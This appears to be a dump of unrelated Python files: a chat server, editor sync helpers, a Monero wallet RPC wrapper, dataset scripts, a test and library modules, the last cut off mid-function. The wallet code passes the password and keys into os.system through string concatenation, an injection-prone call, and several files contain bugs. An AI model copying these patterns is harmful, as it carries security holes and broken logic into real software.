) -> typing.NoReturn:
indices = sorted(
range(n),
key=lambda i: h[i],
)
inf = 1 << 50
bit = [-inf] * (n + 1)
for i in indices:
v = get_mx(bit, i + 1)
a[i] = max(a[i], a[i] + v)
set_val(bit, i + 1, a[i])
print(max(a))
def main() -> typing.NoReturn:
n = int(input())
*h, = map(
int, input().split(),
)
*a, = map(
int, input().split(),
)
solve(n, h, a)
main()
|
#!usr/bin/env
# -*-encoding:utf-8-*-
# 求解问题:
# 问题说明: 接收来自客户端的2类消息:第一次自报家门消息,其后任何广播的消息(发到公共聊天室)
# 异常:
# 编写PDL:
# 抽象PDL: 判断消息类型。 自报家门-->新建定向子进程,然后定向子进程负责后续通信;广播-->传递数据到广播进程。
# 具体PDL:
# 数据规范:
# 客户端上报且经过server父进程去重后的username将作为server识别客户端的标识,以及视图层展示时区分用户的标识。username的命名
# 一般采用humannic的语言,server将检查重复情况,将后继重复者的username加上诸如(1)(2)这样的后缀加以区分。
# 自报家门数据格式: self:{username}:{any info}
# 请求广播格式:broadcast:{username}:{info wanted to send}, 注:广播消息根据实际到达client的时间排序
# 单播数据报格式: {time of client msg creating}:{friendusername}:{info wanted to send},注:单播消息的数据顺序由接收客户端负责
# server针对客户端自曝家门回应的报文: server:{checkedusername}:{any info}
# server组装单播消息: {time of client msg creating}:{sourcesusername}:{info from source client}
# server组装广播消息: {sourceusername}:{info wanted to send}
#
# server父进:
# 0.server父进程负责维护:广播消息队列bdcast_msgs_q,所有连线了的客户端的信息all_clients,
# 通向各个client的消息队列(使用Pipes)cli_cli_msgs_ps.
# 1.创建处理广播的子进程,
# 2.若是新客户端自报家门(自家门时必须提供自定义的username),更新all_clients,
# 检查username的重名的问题(若重名使用后缀(1)(2)形式重命名以区分),创建定向子进程,传入检查过的username,并回传给client.
# 3.若是广播消息,放入广播的数据队列bdcast_msgs_q供广播处理子进程消费
# (客户端如何接收广播???)
#
# 定向子进程:
# 回传server父进程关于username的确认信息,以及用于后继通信(发起单播消息)的定向子进程标识sonAddr.
# (客户端必须确定自报家门成功,然后客户端最终确定自己的名字username,以及用于后继通讯的服务器子进程sonAddr,通过该地址完成后继通信)
# 若有单播消息到来,根据客户端发起方提供的客户端接收方username,将消息处理后放入对应接收方客户端的消息队列中。
# (客户端接收方必须自行解析单播数据报,以区分发起通信的客户端username)
#
import socket
import multiprocessing as mp
import threading as th
import re
import time
HOST = '192.168.2.102'
PORT = 1069
BUFSIZE = 65536
cli_bdcast_port = 1069
msgType = {'self': 'self', 'broadcast': 'broadcast'}
# 所有向服务器自报家门的客户端地址{username: addr}, username:是每个自报家门者报告的名字(去重后),addr是报告者地址
all_clients = {}
def main():
"""创建广播进程,启动UDPServer,判断接受到的消息类型,并启动相应进程或传送数据给广播进程"""
# 等待广播的消息队列,消息项是字符串,格式 {sourcename}:{info want to broadcast}
bdcast_msgs_q = mp.Queue()
# 客户端到客户端间会话消息管道{key, aPipes}, 每个客户端定向进程有一个Pipes; key是所定向的客户端addr
cli_cli_msgs_ps = {}
# 创建广播进程
create_br_p(bdcast_msgs_q, cli_bdcast_port)
# 启动UDPServer父进程
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((HOST, PORT))
# UDPServer接收来自客户端的请求
while True:
data, addr = s.recvfrom(BUFSIZE)
dtype = _msg_type(data.encode('utf-8'))
# 如果是自报家门的消息,创建定向服务进程
if dtype == msgType['self']:
# 客户端username去重
uname = data.encode('utf-8').split(':')[1].strip()
cli_name = _rename_cli(uname)
# 纪录客户端信息
if uname != cli_name:
all_clients[cli_name] = addr
# 创建定向服务进程
di_server = mp.Process(target=create_di_p, args=(addr, cli_name, cli_cli_msgs_ps, cli_name))
di_server.start()
di_server.join()
# 如果是广播,将消息放广播队列中
# 接收的消息格式 broadcast:{username}:{info wanted to send}
# 组装消息的格式 {sourceusername}:{info wanted to send}
if dtype == msgType['broadcast']:
cdata = data.decode('utf-8')
b_msg = cdata[cdata.find(':', 2) + 1:].encode('utf-8')
per_add = cdata[cdata.find(':') + 1:cdata.find(':', 2)].encode('utf-8')
ali = _slice_msg(b_msg, per_add)
for it in ali:
bdcast_msgs_q.put(it)
def _rename_cli(name):
if name.strip() in all_clients.keys():
return name
next_ind = 1
for it in all_clients.keys():
m = re.match(r'(.*)(\((\d*)\))$', it)
if m:
results = m.groups()
if results[0].strip() == name:
t = int(results[2]) + 1
if t > next_ind:
next_ind = t
return '{}({})'.format(name, next_ind)
def create_br_p(bdcast_msgs_q, bdcast_port):
"""创建广播进程"""
bdcast_p = mp.Process(target=broct_task, args=(bdcast_msgs_q, bdcast_port))
bdcast_p.start()
bdcast_p.join()
def create_di_p(cli_addr, cli_name, cli_cli_msgs_ps, additional='directional msg'):
"""创建定向服务进程:
Args:
cli_addr: tuple(host,port), 定向服务进程所指向的客户端地址
cli_name: 客户端名称
additional: 字符串,该子进程创建后第一次响应客户端的自报家门请求时,fu带的消息
"""
pipe = mp.Pipe()
cli_cli_msgs_ps[cli_addr] = pipe
# 首次回应客户端的连接请求
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(cli_addr)
msg = 'server:{}:{}'.format(cli_name, additional).encode('utf-8')
s.sendto(msg, cli_addr)
# 接收客户端请求
threcv = th.Thread(target=_recv_msg_task(), args=(s, cli_name, cli_cli_msgs_ps))
threcv.start()
threcv.join()
# 响应客户端的请求
thsend = th.Thread(target=_send_msg_task(), args=(s, cli_addr, cli_cli_msgs_ps))
thsend.start()
thsend.join()
def _recv_msg_task(sock, cli_name, cli_cli_msgs_ps):
"""接收并处理定向的客户端的消息"""
while True:
# 数据格式: {time of client msg creating}:{friendusername}:{info wanted to send}
data, addr = sock.recvfrom(BUFSIZE)
# 检查数据想要到达的客户端
cdata = data.decode('utf-8')
funame = cdata.split(':')[1]
faddr = all_clients[funame]
# 组装消息
# {time of client msg creating}:{sourcesusername}:{info from source client}
b_msg = cdata[cdata.find(':', 2) + 1:].encode('utf-8')
per_add = [str(time.time()).encode('utf-8'), cli_name.encode('utf-8')]
msgs = _slice_msg(b_msg, *per_add)
# 将消息放到目标客户端的pipes队列中
friend_pipe = cli_cli_msgs_ps[faddr][0]
for it in msgs:
friend_pipe.send(it)
def _send_msg_task(sock, cli_addr, cli_cli_msgs_ps):
"""响应定向客户端的消息"""
pipe = cli_cli_msgs_ps[cli_addr][1]
while True:
sock.sendto(pipe.recv(), cli_addr)
def broct_task(q, prot):
"""将广播消息队列中的消息广播出去。
Args:
q: queue, 即将被转发消息的队列,每一项是一个str
prot: 广播端口
"""
brocast_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
brocast_s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
msg = q.get()
sep_index = msg.find(':')
cli_name = msg[0:sep_index]
slices = _slice_msg(msg[sep_index + 1:].encode('utf-8'), cli_name.encode('utf-8'))
for it in slices:
brocast_s.sendto(it, ('<broadcast>', prot))
def _slice_msg(b_msg, *per_add, maxlen=1474):
""" 将要广播的消息进行分片,避免广播数据太大而导致的广播失败.
Args:
b_msg: str, 要进行广播的二进制字符串消息
per_add: str, 要在每个分片上额外添加的二进制数据,用于组合分片消息的头部
maxlen: int, 分片之后的每个二进制消息的最大长度,其取值方法为1500-报文中udp或tcp头的大小,一般无需更改
Returns:
list: 广播的消息分片结果,所有数据项都是二进制的,格式 'head:msgxxx'
"""
result = []
tlt_add_len = 0
head = b''
for it in per_add:
tlt_add_len += len(it)
head += it
msg_max_len = maxlen - tlt_add_len - len(per_add) * len(':'.encode('utf-8'))
while len(b_msg) > msg_max_len:
result.append(head + ':'.encode('utf-8') + b_msg[0:msg_max_len])
b_msg = b_msg[msg_max_len:]
result.append(head + ':'.encode('utf-8') + b_msg)
return result
def _msg_type(msg):
"""判断用户请求消息的类型: 分2种
自报家门的消息格式: self:username:xxx,
广播的消息格式: broadcast:username:info data .
Args:
msg: str, 消息字符串
Returns:
str: 两种字符串 ‘self’ 或 ‘broadcast’
"""
li = msg.split(':')
if len(li) > 1 and li[0] == msgType['self']:
return msgType['self']
if len(li) > 1 and li[0] == msgType['broadcast']:
return msgType['broadcast']
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from fnmatch import fnmatch
import os
import requests
import shutil
import sublime
import threading
import time
from .libs import path, settings
from .libs.logger import logger
from queue import Queue
def get_content(file):
if not path.exists(file):
return ''
try:
with open(file, 'rb') as fi:
# TODO: Figure how to solve these kind of errors (for now ignore it)
# `UnicodeDecodeError: 'utf-8' codec can't decode byte 0x86 in position 23: invalid start byte`
return fi.read().decode('utf-8', errors='ignore')
except Exception as e:
logger.warning('file `{}` has errors'.format(file))
logger.exception(e)
return ''
def should_exclude(file_name):
patterns = settings.get('excluded_files') or []
# copy list to avoid side effects
p = patterns[:]
# ignore SyncSettings.sublime-settings file to avoid not wanted changes
p.extend(['*SyncSettings.sublime-settings'])
for pattern in p:
if fnmatch(file_name, pattern):
return True
return False
def should_include(file_name):
patterns = settings.get('included_files') or []
# copy list to avoid side effects
for pattern in patterns:
# ignore SyncSettings.sublime-settings file to avoid not wanted changes
if fnmatch(file_name, '*SyncSettings.sublime-settings'):
return False
if fnmatch(file_name, pattern):
return True
return False
def get_files():
files_with_content = dict()
user_path = path.join(sublime.packages_path(), 'User')
for f in path.list_files(user_path):
encoded_path = path.encode(f.replace('{}{}'.format(user_path, path.separator()), ''))
if encoded_path in files_with_content:
continue
if should_exclude(f) and not should_include(f):
continue
content = get_content(f)
if not content.strip():
continue
files_with_content[encoded_path] = {'content': content, 'path': f}
return files_with_content
def download_file(q):
while not q.empty():
url, name = q.get()
try:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(name, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
except: # noqa: E722
pass
finally:
q.task_done()
def fetch_files(files, to=''):
if not path.exists(to, folder=True):
os.mkdir(to)
else:
shutil.rmtree(to, ignore_errors=True)
rq = Queue(maxsize=0)
user_path = path.join(sublime.packages_path(), 'User')
items = files.items()
for k, file in items:
decoded_name = path.decode(k)
name = path.join(user_path, decoded_name)
if should_exclude(name) and not should_include(name):
continue
rq.put((file['raw_url'], path.join(to, k)))
threads = min(10, len(items))
for i in range(threads):
worker = threading.Thread(target=download_file, args=(rq,))
worker.setDaemon(True)
worker.start()
time.sleep(0.1)
rq.join()
def move_files(origin):
user_path = path.join(sublime.packages_path(), 'User')
for f in os.listdir(origin):
# set preferences and package control files to the final of the list
if fnmatch(f, '*Preferences.sublime-settings') or fnmatch(f, '*Package%20Control.sublime-settings'):
continue
name = path.join(user_path, path.decode(f))
directory = os.path.dirname(name)
if not path.exists(directory, True):
os.makedirs(directory)
shutil.move(path.join(origin, f), name)
pending_files = ['Preferences.sublime-settings', 'Package%20Control.sublime-settings']
for f in pending_files:
if not path.exists(path.join(origin, f)):
continue
shutil.move(path.join(origin, f), path.join(user_path, path.decode(f)))
|
import requests as req
import json
from . import classes
from .. import utils
import subprocess
import time
import os
def newWalletFromViewKey(address, view_key, wallet_dir, wallet_file, wallet_pass):
''' newWalletFromViewKey(address, view_key, wallet_file, wallet_pass) :: initialize a
new wallet using simplewallet from a view key and address, then exit. '''
# Create subprocess call for simplewallet in screen
# simplewallet --generate-from-view-key 46BeWrHpwXmHDpDEUmZBWZfoQpdc6HaERCNmx1pEYL2rAcuwufPN9rXHHtyUA4QVy66qeFQkn6sfK8aHYjA3jk3o1Bv16em:e422831985c9205238ef84daf6805526c14d96fd7b059fe68c7ab98e495e5703:wallet000001.bin --password 12345678 exit
#subprocess_call = ['screen','simplewallet', '--generate-from-view-key',
# address+':'+view_key+':'+wallet_file, '--password', wallet_pass, 'exit']
# Call subprocess
#try:
#subprocess.call(subprocess_call, cwd=wallet_dir)
os.chdir(wallet_dir)
os.system('simplewallet --generate-from-view-key ' + address+':'+view_key+':'+wallet_file + ' --password ' + wallet_pass)
# message = "New view-only wallet '" + wallet_file + "' successfully created."
# return message, 0
#except:
# error = utils.ErrorMessage("Error starting simplewallet.")
# return error, 1
def startWallet(wallet, wallet_file, wallet_pass, wallet_name=None):
''' startWallet() :: initialize simplewallet for a wallet that already exists. '''
# Setup timer for launching wallet
start = time.time()
# Trim "http(s)://" from wallet.HOST for simplewallet ip
wallet_ip = wallet.HOST
wallet_ip = wallet_ip.replace("http://","")
wallet_ip = wallet_ip.replace("https://","")
# Create subprocess call for simplewallet in screen
subprocess_call = ["screen"]
if wallet_name is not None:
subprocess_call.extend(["-S", wallet_name])
subprocess_call.extend(["-dm", "simplewallet",
"--wallet-file", wallet_file,
"--password", wallet_pass,
"--rpc-bind-ip", wallet_ip,
"--rpc-bind-port", wallet.PORT])
# Call subprocess
try:
subprocess.call(subprocess_call)
except:
error = utils.ErrorMessage("Error starting simplewallet.")
return error, 1
err = 1
k = 0
while err != 0:
wallet_balance, err = getWalletHeight(wallet)
k += 1
if k > 150: # Takes longer than 5 seconds to start simplewallet
error = utils.ErrorMessage("Error connecting simplewallet.")
return error, 1
time.sleep(0.2)
dt = time.time() - start
message = 'Wallet started successfully in ' + str(dt) + ' seconds'
return message, 0
def walletJSONrpc(wallet, rpc_input):
''' walletJSONrpc() :: Send wallet JSON_RPC method and process initial result. '''
# Add standard rpc values
rpc_input.update(wallet.RPC_STANDARD_VALUES)
# Execute the rpc request and return response output
try:
resp = req.post(wallet.RPC_URL,data=json.dumps(rpc_input),headers=wallet.RPC_STANDARD_HEADER)
output = resp.json()
# print(json.dumps(output, indent=2))
# Return result or error message from rpc call
if "result" in output:
result = output["result"]
return result, 0
else:
error = utils.ErrorMessage(output["error"]["message"])
code = output["error"]["code"]
if code == 0:
code = -1
return error, code
except:
result = utils.ErrorMessage("Error returning result fom 'walletJSONrpc'.")
return result, 1
def getWalletBalance(wallet):
''' getWalletBalance() :: Function that returns "getbalance" rpc call info. '''
# Create rpc data input
rpc_input = { "method": "getbalance" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
wallet_balance = classes.WalletBalance(result)
return wallet_balance, 0
except:
error = utils.ErrorMessage("Error returning result fom 'getWalletBalance'.")
return error, 1
else:
return result, err
def getWalletAddress(wallet):
''' getWalletAddress() :: Function that returns "getaddress" rpc call info. '''
# Create rpc data input
rpc_input = { "method": "getaddress" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
address = result["address"]
return address, 0
except:
error = utils.ErrorMessage("Error returning result fom 'getWalletAddress'.")
return error, 1
else:
return result, err
def getWalletHeight(wallet):
''' getWalletHeight() :: Function that returns "getheight" rpc call info. '''
# Create rpc data input
rpc_input = { "method": "getheight" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result["height"], 0
except:
error = utils.ErrorMessage("Error returning result fom 'getWalletHeight'.")
return error, 1
else:
return result, err
def getPayments(wallet, payment_id):
''' getPayments() :: Returns payments to wallet matching payment_id using "get_payments" rpc call. '''
# Create rpc data input
rpc_input = { "method": "get_payments", "params": {"payment_id": payment_id} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
payments = []
for i in range(0, len(result["payments"])):
payments.append(classes.Payment(result["payments"][i]))
return payments, 0
except:
error = utils.ErrorMessage("Error returning result fom 'getWalletHeight'.")
return error, 1
else:
return result, err
def getBulkPayments(wallet, pay_ids):
''' getBulkPayments() :: Returns payments to wallet matching payment_id using "get_bulk_payments" rpc call.
"pay_ids" can either be a single payment ID string, or an array of payment ID strings.
This method is preferred over the getPayments() option. '''
# Make sure payment_ids is an array
if isinstance(pay_ids, str):
payment_ids = [ pay_ids ]
else:
payment_ids = hashes
# Create rpc data input
rpc_input = { "method": "get_bulk_payments", "params": {"payment_ids": payment_ids} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
payments = []
for i in range(0, len(result["payments"])):
payments.append(classes.Payment(result["payments"][i]))
return payments, 0
except:
error = utils.ErrorMessage("Error returning result fom 'getWalletHeight'.")
return error, 1
else:
return result, err
def incomingTransfers(wallet, type):
''' incomingTransfers(): Get received transactions (type = "all", "available", or "unavailable"). '''
# Create rpc data input
rpc_input = { "method": "incoming_transfers", "params": {"transfer_type": type} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
print(err)
print(json.dumps(result,indent=2))
# Return formatted result
if err == 0:
try:
print(len(result["transfers"]))
#print(json.dumps(result))
#payments = []
#for i in range(0, len(result["payments"])):
# payments.append(classes.Payment(result["payments"][i]))
#return payments, 0
except:
error = utils.ErrorMessage("Error returning result fom 'incomingTransfers'.")
return error, 1
else:
print(result.error)
#return result, err
def makeTransfer(wallet, receive_addresses, amounts_atomic, payment_id, mixin):
''' makeTransfer() :: Make transaction(s) (Note: 1 Coin = 1e12 atomic units). '''
# Prep destinations rpc array
destinations, err = _setupDestinations(receive_addresses, amounts_atomic)
if err != 0:
return destinations, err
# Create rpc data input
params = { "destinations": destinations, "mixin": mixin, "payment_id": payment_id}
rpc_input = { "method": "transfer", "params": params }
print(json.dumps(rpc_input, indent=2))
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
transfer_result = classes.TransferResult(result)
return transfer_result, 0
except:
error = utils.ErrorMessage("Error returning result fom 'makeTransfer'.")
return error, 1
else:
return result, err
def makeTransferSplit(wallet, receive_addresses, amounts_atomic, payment_id, mixin):
''' makeTransferSplit() :: Make transaction(s), split up (Note: 1 Coin = 1e12 atomic units). '''
# Prep destinations rpc array
dests, err = _setupDestinations(receive_addresses, amounts_atomic)
if err != 0:
return dests, err
# Create rpc data input
params = { "destinations": dests, "mixin": mixin, "payment_id": payment_id, "new_algorithm": False }
rpc_input = { "method": "transfer_split", "params": params }
print(json.dumps(rpc_input, indent=2))
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
transfer_result = classes.TransferResult(result)
return transfer_result, 0
except:
error = utils.ErrorMessage("Error returning result fom 'makeTransfer'.")
return error, 1
else:
return result, err
def _setupDestinations(receive_addresses, amounts_atomic):
''' _setupDestination :: Put receive_addresses and amounts_atomic into destinations array '''
# Make sure receive_addresses is an array
if isinstance(receive_addresses, str):
recipients = [ receive_addresses ]
else:
recipients = receive_addresses
# Make sure amounts_atomic is an array
if isinstance(amounts_atomic, int):
amounts = [ amounts_atomic ]
else:
amounts = amounts_atomic
# Make sure number of recipients matches number of amounts
N_recipients = len(recipients)
if N_recipients != len(amounts):
error = utils.ErrorMessage("Error: Number of recipients does not match number of amounts.")
return error, 1
# Fill out destinations for rpc data input
destinations = []
for i in range(0, N_recipients):
destinations.append({"address": recipients[i], "amount": amounts[i]})
return destinations, 0
def queryKey(wallet, key_type):
''' queryKey() :: Returns key info of type "key_type" ("mnemonic" or "view_key"). '''
# Create rpc data input
rpc_input = { "method": "query_key", "params": {"key_type": key_type} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result["key"], 0
except:
error = utils.ErrorMessage("Error returning result fom 'queryKey'.")
return error, 1
else:
return result, err
def sweepDust(wallet):
''' sweepDust() :: Get all wallet inputs that are too small and sweep. '''
# Create rpc data input
rpc_input = { "method": "sweep_dust" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result["tx_hash_list"], 0
except:
error = utils.ErrorMessage("Error returning result fom 'sweepDust'.")
return error, 1
else:
return result, err
def stopWallet(wallet):
''' stopWallet() :: Cleanly disconnect simplewallet from daemon and exit. '''
# Create rpc data input
rpc_input = { "method": "stop_wallet" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result, 0
except:
error = utils.ErrorMessage("Error returning result fom 'stopWallet'.")
return error, 1
else:
return result, err
def rescanBlockchain(wallet):
''' rescanBlockchain() :: Re-scan blockchain for wallet transactions from genesis. '''
# Create rpc data input
rpc_input = { "method": "rescan_blockchain" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result, 0
except:
error = utils.ErrorMessage("Error returning result fom 'rescanBlockchain'.")
return error, 1
else:
return result, err
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import glob
import random
for age in range(16, 55):
# 野球選手
# ロードするパス
load_path = './data/baseball_player_list_age' + str(age) + '.txt'
# 保存するパス
save_path = './data/baseball_image_path_list_age' + str(age) + '.txt'
person_path_list = []
with open(load_path, 'r') as f:
for line in f:
person_data = line.strip().split(',')
if len(person_data) == 3:
person_path_list.append(person_data[1])
# シャッフル
random.shuffle(person_path_list)
baseball_num = len(person_path_list)
# テキストファイルに保存
with open(save_path, 'w') as f:
for person_path in person_path_list:
person_img_path_list = glob.glob('./image/' + person_path + '/*.jpg')
for person_img_path in person_img_path_list:
f.write(person_img_path + '\n')
print('[Save] {0}'.format(save_path))
# サッカー選手
# ロードするパス
load_path = './data/football_player_list_age' + str(age) + '.txt'
# 保存するパス
save_path = './data/football_image_path_list_age' + str(age) + '_origin.txt'
person_path_list = []
with open(load_path, 'r') as f:
for line in f:
person_data = line.strip().split(',')
if len(person_data) == 3:
person_path_list.append(person_data[1])
# シャッフル
random.shuffle(person_path_list)
person_path_list = person_path_list
# テキストファイルに保存
with open(save_path, 'w') as f:
for person_path in person_path_list:
person_img_path_list = glob.glob('./image/' + person_path + '/*.jpg')
for person_img_path in person_img_path_list:
f.write(person_img_path + '\n')
# 保存するパス
save_path = './data/football_image_path_list_age' + str(age) + '.txt'
person_path_list = []
with open(load_path, 'r') as f:
for line in f:
person_data = line.strip().split(',')
if len(person_data) == 3:
person_path_list.append(person_data[1])
# シャッフル
random.shuffle(person_path_list)
person_path_list = person_path_list[:baseball_num]
# テキストファイルに保存
with open(save_path, 'w') as f:
for person_path in person_path_list:
person_img_path_list = glob.glob('./image/' + person_path + '/*.jpg')
for person_img_path in person_img_path_list:
f.write(person_img_path + '\n')
print('[Save] {0}'.format(save_path))
|
import pytest
import warnings
import offlinetb
def test_capture_warnings(recwarn):
warnings.simplefilter('always')
try:
f()
except CustomException:
tb = offlinetb.distill(var_depth=4)
[v] = [v for v in tb['traceback'][-1]['vars'] if v['name'] == 's']
assert v['vars'][0]['value'] == "'hi'"
assert len(recwarn) == 0
def f():
g()
def g():
class Something(object):
@property
def prop(self):
warnings.warn('deprecated', DeprecationWarning)
return 'hi'
s = Something() # pylint: disable=unused-variable
raise CustomException()
class CustomException(Exception):
pass
|
#!/usr/bin/env python
"""
A module that uses an `eta.core.learning.VideoFramesClassifier` to classify the
frames of a video using a sliding window strategy.
Info:
type: eta.core.types.Module
version: 0.1.0
Copyright 2017-2022, Voxel51, Inc.
voxel51.com
"""
# pragma pylint: disable=redefined-builtin
# pragma pylint: disable=unused-wildcard-import
# pragma pylint: disable=wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import *
from future.utils import iteritems
# pragma pylint: enable=redefined-builtin
# pragma pylint: enable=unused-wildcard-import
# pragma pylint: enable=wildcard-import
from collections import defaultdict, deque
import logging
import sys
from eta.core.config import Config
import eta.core.data as etad
import eta.core.learning as etal
import eta.core.module as etam
import eta.core.video as etav
logger = logging.getLogger(__name__)
class ModuleConfig(etam.BaseModuleConfig):
"""Module configuration settings.
Attributes:
data (DataConfig)
parameters (ParametersConfig)
"""
def __init__(self, d):
super(ModuleConfig, self).__init__(d)
self.data = self.parse_object_array(d, "data", DataConfig)
self.parameters = self.parse_object(d, "parameters", ParametersConfig)
class DataConfig(Config):
"""Data configuration settings.
Inputs:
video_path (eta.core.types.Video): the input video
input_labels_path (eta.core.types.VideoLabels): [None] an optional
input VideoLabels file to which to add the predictions
Outputs:
output_labels_path (eta.core.types.VideoLabels): a VideoLabels file
containing the predictions
"""
def __init__(self, d):
self.video_path = self.parse_string(d, "video_path")
self.input_labels_path = self.parse_string(
d, "input_labels_path", default=None
)
self.output_labels_path = self.parse_string(d, "output_labels_path")
class ParametersConfig(Config):
"""Parameter configuration settings.
Parameters:
classifier (eta.core.types.VideoFramesClassifier): an
`eta.core.learning.VideoFramesClassifierConfig` describing the
`eta.core.learning.VideoFramesClassifier` to use
window_size (eta.core.types.Number): the size of the sliding window in
which to perform classification
stride (eta.core.types.Number): the stride of the sliding window
confidence_threshold (eta.core.types.Number): [None] a confidence
threshold to use when assigning labels
confidence_weighted_vote (eta.core.types.Boolean): [False] whether to
weight any per-frame-attribute votes by confidence
"""
def __init__(self, d):
self.classifier = self.parse_object(
d, "classifier", etal.VideoFramesClassifierConfig
)
self.window_size = self.parse_number(d, "window_size")
self.stride = self.parse_number(d, "stride")
self.confidence_threshold = self.parse_number(
d, "confidence_threshold", default=None
)
self.confidence_weighted_vote = self.parse_bool(
d, "confidence_weighted_vote", default=False
)
def _build_attribute_filter(threshold):
if threshold is None:
logger.info("Predicting all attributes")
filter_fcn = lambda attrs: attrs
else:
logger.info("Returning predictions with confidence >= %f", threshold)
attr_filters = [
lambda attr: attr.confidence is None
or attr.confidence > float(threshold)
]
filter_fcn = lambda attrs: attrs.get_matches(attr_filters)
return filter_fcn
def _apply_video_frames_classifier(config):
# Build classifier
classifier = config.parameters.classifier.build()
logger.info("Loaded classifier %s", type(classifier))
# Process videos
with classifier:
for data in config.data:
_process_video(data, classifier, config.parameters)
def _process_video(data, classifier, parameters):
# Load labels
if data.input_labels_path:
logger.info(
"Reading existing labels from '%s'", data.input_labels_path
)
labels = etav.VideoLabels.from_json(data.input_labels_path)
else:
labels = etav.VideoLabels()
# Process frames directly
logger.info("Processing video '%s'", data.video_path)
with etav.FFmpegVideoReader(data.video_path) as vr:
_classify_windows(classifier, vr, labels, parameters)
logger.info("Writing labels to '%s'", data.output_labels_path)
labels.write_json(data.output_labels_path)
def _classify_windows(classifier, video_reader, labels, parameters):
# Parameters
wsize = parameters.window_size
wstride = parameters.stride
cthresh = parameters.confidence_threshold
cweighted = parameters.confidence_weighted_vote
# Build filter
attr_filter = _build_attribute_filter(cthresh)
#
# Sliding window classification
#
# FIFO queue of length `wsize` to hold the window of images
imgs = deque([], wsize)
# Containers to store all of the attributes that are generated
attrs_map = defaultdict(lambda: etad.AttributeContainer())
# The next frame at which to run the classifier
next_classify_frame = wsize
for frame_number, img in enumerate(video_reader, 1):
# Ingest next frame
imgs.append(img)
if frame_number < next_classify_frame:
# Not time to classify yet
continue
# Set next classification frame
next_classify_frame += wstride
# Classify window
attrs = attr_filter(classifier.predict(imgs))
for attr in attrs:
for idx in range(frame_number - wsize + 1, frame_number + 1):
attrs_map[idx].add(attr)
# Finalize attributes
for frame_number, attrs in iteritems(attrs_map):
# Majority vote over frame
final_attrs = etad.majority_vote_categorical_attrs(
attrs, confidence_weighted=cweighted
)
labels.add_frame_attributes(final_attrs, frame_number)
def run(config_path, pipeline_config_path=None):
"""Run the apply_video_frames_classifier module.
Args:
config_path: path to a ModuleConfig file
pipeline_config_path: optional path to a PipelineConfig file
"""
config = ModuleConfig.from_json(config_path)
etam.setup(config, pipeline_config_path=pipeline_config_path)
_apply_video_frames_classifier(config)
if __name__ == "__main__":
run(*sys.argv[1:]) # pylint: disable=no-value-for-parameter
|
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import IECore
import Gaffer
import GafferDispatch
class TextWriter( GafferDispatch.TaskNode ) :
def __init__( self, name="TextWriter", requiresSequenceExecution = False ) :
GafferDispatch.TaskNode.__init__( self, name )
self.__requiresSequenceExecution = requiresSequenceExecution
self.addChild( Gaffer.StringPlug( "fileName", Gaffer.Plug.Direction.In ) )
self.addChild( Gaffer.StringPlug( "mode", defaultValue = "w", direction = Gaffer.Plug.Direction.In ) )
self.addChild( Gaffer.StringPlug( "text", Gaffer.Plug.Direction.In ) )
def execute( self ) :
context = Gaffer.Context.current()
fileName = self["fileName"].getValue()
directory = os.path.dirname( fileName )
if directory :
try :
os.makedirs( directory )
except OSError :
# makedirs very unhelpfully raises an exception if
# the directory already exists, but it might also
# raise if it fails. we reraise only in the latter case.
